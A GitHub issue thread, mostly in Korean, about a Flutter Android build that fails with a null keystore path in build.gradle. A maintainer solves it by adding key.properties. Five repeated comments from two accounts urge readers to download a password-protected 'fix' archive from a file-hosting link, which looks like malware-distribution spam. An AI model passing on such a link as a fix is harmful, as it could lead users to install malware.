### ISSUE TITLE
릴리스 테스트 빌드 FAILURE: Build failed with an exception

### ISSUE THREAD

**Issue by call-me-bammer** [SWM-15th-Dnight/flutter-client#4]
# Result

`feature/calendar-crud` 브랜치의 `b525931` 커밋 빌드가 안됩니다.

# How

/android/app에 `key.jks` 넣고
/android/app/google-services.json line 12에 패키지명 수동으로 수정하고
빌드하는데 /android/app/build.gradle line 60에서 걸려서 안됩니다.
수정될 때까지 `4a1421b` 커밋에 이어서 작업하고 있겠습니다.

```
FAILURE: Build failed with an exception.

* Where:
Build file '/Users/bammer/Desktop/git/flutter-client/android/app/build.gradle' line: 60

* What went wrong:
A problem occurred evaluating project ':app'.
> path may not be null or empty string. path='null'

* Try:
> Run with --stacktrace option to get the stack trace.
> Run with --info or --debug option to get more log output.
> Run with --scan to get full insights.

* Get more help at https://help.gradle.org

BUILD FAILED in 448ms
Error: Gradle task assembleDebug failed with exit code 1

```

# Screenshot

![image](https://github.com/user-attachments/assets/47b5a471-8d30-4b1c-a47e-6164ac22b769)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by koderpark** [comment]
solved.
add `key.properties` file to /android

**Comment by call-me-bammer** [comment]
good job.
